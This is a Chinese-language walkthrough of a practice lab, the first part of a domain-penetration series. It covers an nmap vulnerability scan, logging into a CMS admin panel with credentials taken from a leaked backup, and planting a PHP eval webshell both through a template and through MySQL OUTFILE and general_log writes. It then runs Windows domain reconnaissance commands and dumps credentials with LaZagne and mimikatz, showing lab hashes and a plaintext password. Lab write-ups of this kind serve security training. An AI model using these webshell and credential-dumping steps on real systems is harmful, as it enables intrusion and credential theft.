注:本系列以红日安全的ATT&CK(一)靶场展开。
篇幅略长,阅读需耐心。
本章节涉及到的知识点
一、环境搭建
1.环境搭建 2.信息收集
二、漏洞利用 3.漏洞搜索与利用 4.后台Getshell上传技巧 5.系统信息收集 6.主机密码收集
一、环境搭建
设置vm2网卡(192.168.52.0)
设置vm1网卡(192.168.33.0)网络拓扑图
前期打点 nmap扫描
代码语言:javascript复制root@kepler:~/桌面# nmap -sV -Pn 192.168.33.5 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 14:30 CST
Stats: 0:02:55 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 78.85% done; ETC: 14:33 (0:00:32 remaining)
Stats: 0:03:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.89% done; ETC: 14:33 (0:00:02 remaining)
Nmap scan report for 192.168.33.5
Host is up (0.00045s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
/tcp open http Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.33.5
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.33.5:80/
| Form id:
| Form action: /l.php#bottom
|
| Path: http://192.168.33.5:80/l.php
| Form id:
|_ Form action: /l.php#bottom
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpinfo.php: Possible information file
| /phpmyadmin/: phpMyAdmin
| /phpMyAdmin/: phpMyAdmin
|_ /PHPMyAdmin/: phpMyAdmin
| http-phpself-xss:
| VULNERABLE:
| Unsafe use of $_SERVER["PHP_SELF"] in PHP files
| State: VULNERABLE (Exploitable)
| PHP files are not handling safely the variable $_SERVER["PHP_SELF"] causing Reflected Cross Site Scripting vulnerabilities.
|
| Extra information:
|
| Vulnerable files with proof of concept:
| http://192.168.33.5/l.php/'"/>
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.33.5
| References:
| http://php.net/manual/en/reserved.variables.server.php
|_ https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.33.5:80/l.php?act=Function' OR sqlspider
| http://192.168.33.5:80/l.php?act=phpinfo' OR sqlspider
| http://192.168.33.5:80/l.php?act=Function' OR sqlspider
| http://192.168.33.5:80/l.php?act=phpinfo' OR sqlspider
| http://192.168.33.5:80/l.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000' OR sqlspider
| http://192.168.33.5:80/l.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42' OR sqlspider
| http://192.168.33.5:80/l.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42' OR sqlspider
| Possible sqli for forms:
| Form at path: /, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
| funName
| Form at path: /l.php, form's action: /l.php#bottom. Fields that might be vulnerable:
| host
| port
| login
|_ funName
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
3306/tcp open mysql MySQL (unauthorized)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:D7:7E:A2 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 250.55 seconds在php探针页面下发现一个xss
代码语言:javascript复制http://192.168.33.5/l.php/'"/>扫描目录
通过扫描发现了一个备份rar,beifen.rar
解压得到yxcms
试试访问路径
代码语言:javascript复制curl -i http://192.168.33.5/yxcms/
看到后台路径和账号密码
二、漏洞利用
后台GetShell
成功登陆到yxcms的后台
在模版下添加一句话木马,蚁剑连接
成功连接
Mysql写webshell
代码语言:javascript复制select '<?php eval($_POST[a]);?>' INTO OUTFILE 'C:/phpStudy/WWW/aa.php';
发现有安全模式
查看这个的值,为NULL不可读写
代码语言:javascript复制show global variables like '%secure%';
show variables like '%general%';查询全局日志变量配置
set global general_log=on; 开启日志
set global general_log_file='C:/phpStudy/WWW/web1.php'; 设置日志位置为网站目录select '<?php @eval($_POST['aaa']);?>';
之后蚁剑去连接
三、内网信息收集
查看当前权限
代码语言:javascript复制whoami && whoami /priv
查看ip
代码语言:javascript复制ipconfig /all
通过这个看到存在域
查看系统信息
代码语言:javascript复制systeminfo
查看网络连接
代码语言:javascript复制netstat -ano
查看安装应用
代码语言:javascript复制wmic product get name,version
查看进程
代码语言:javascript复制tasklist /v
net start ------ 查看当前运行的服务
看到一些进程是域管理员启动的,可以窃取进程
查看远程连接信息
代码语言:javascript复制cmdkey /l
查看杀软
代码语言:javascript复制WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
查看在线用户
代码语言:javascript复制quser
查看密码复杂策略
代码语言:javascript复制net accounts ------ 查看本地密码策略
net accounts /domain ------ 查看域密码策略
查看当前系统版本
代码语言:javascript复制wmic OS get Caption,CSDVersion,OSArchitecture,Version
查看本机管理员
代码语言:javascript复制net localgroup administrators
net localgroup administrators /domain 登录本机的域管理员
查看当前登录域
代码语言:javascript复制net config workstation
查看域用户
代码语言:javascript复制net user /domain
查看域管理员的用户组
代码语言:javascript复制net group "domain admins" /domain
查看域控制器
代码语言:javascript复制net group "domain controllers" /domain
查看域机器
代码语言:javascript复制net group "domain computers" /domain
获取域控ip
代码语言:javascript复制ping -a owa.god.org
取密码
取本机密码有几种方式
从注册表里读取,从内存读取,读取浏览器保存的密码,读取vpn保存的密码,读取配置文件保存的密码
上传lazagne
代码语言:javascript复制lazagne.exe all首先读取到ntlm hash的值
浏览器和vpn的密码
mimikatz读取密码如下:
privilege::debug
sekurlsa::logonpasswords
代码语言:javascript复制mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 1957949 (00000000:001de03d)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2020/5/14 21:42:51
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : GOD
* NTLM : 85c1491a3c765c7ae64f73dd12b2c005
* SHA1 : b94ef91fcca7e093910779ddb25cd7189b330037
tspkg :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019:
wdigest :
* Username : Administrator
* Domain : GOD
* Password : hongrisec@2019:
kerberos :
* Username : Administrator
* Domain : GOD.ORG
* Password : hongrisec@2019:
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020/5/14 21:34:40
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2020/5/14 21:34:39
SID : S-1-5-20
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 31f4fed3bf6b625f10c3e98486edf58a
* SHA1 : 21f629c16524d1bb00e8af538dd5d44a2bfe97dc
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
ssp :
credman :
Authentication Id : 0 ; 52651 (00000000:0000cdab)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2020/5/14 21:34:39
SID :
msv :
[00000003] Primary
* Username : STU1$
* Domain : GOD
* NTLM : 31f4fed3bf6b625f10c3e98486edf58a
* SHA1 : 21f629c16524d1bb00e8af538dd5d44a2bfe97dc
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : STU1$
Domain : GOD
Logon Server : (null)
Logon Time : 2020/5/14 21:34:39
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : STU1$
* Domain : GOD
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
kerberos :
* Username : stu1$
* Domain : GOD.ORG
* Password : 6c 20 79 c9 3c 4c f9 5f a1 85 63 94 cd 33 0d 35 e3 9e ee ab 89 7d 58 b1 51 4d f6 db cd 1b e5 42 ea 2d f4 29 30 8f ea fe 05 78 cc ed ad 54 a0 44 68 ef d6 31 30 73 2d 91 9f e6 11 9a be a2 6b 3c ac 81 21 6e 7b f6 5b da ae bc a1 4a 73 50 6a 28 9e 2b d7 8c cf 8c 8e 68 b0 11 2d d0 e3 5f 21 48 26 4b d1 e1 f8 4f 24 2a 04 ff 8a 08 46 31 a2 f8 a0 76 9e 0c 45 a8 ec 6b d0 4a 4b 87 ab 26 a0 25 d2 15 72 2a 0e 42 af e1 2f a8 f2 fc 30 cd 71 ad ae 7a 11 a7 27 0a 33 ea 2b 11 dd 02 ab f6 8b bd b2 2b 77 72 22 89 3e dd f2 75 6c 0a 40 3b b1 17 6f 5d ee 2c 96 f5 2e 2d 90 61 05 8a d1 73 37 e8 8a dc 01 7a 8f f4 2f 2c dc 3b eb 22 68 df 21 34 87 0e aa 5a 0e d4 47 92 c6 17 5e 28 15 90 5e 21 17 31 ed 44 36 4e dc e9 55 2f fc 30 e7 d6 df 70
ssp :
credman :读取完本机信息,开始进行横向拓展
见下文
由浅入深的域渗透系列一(下)
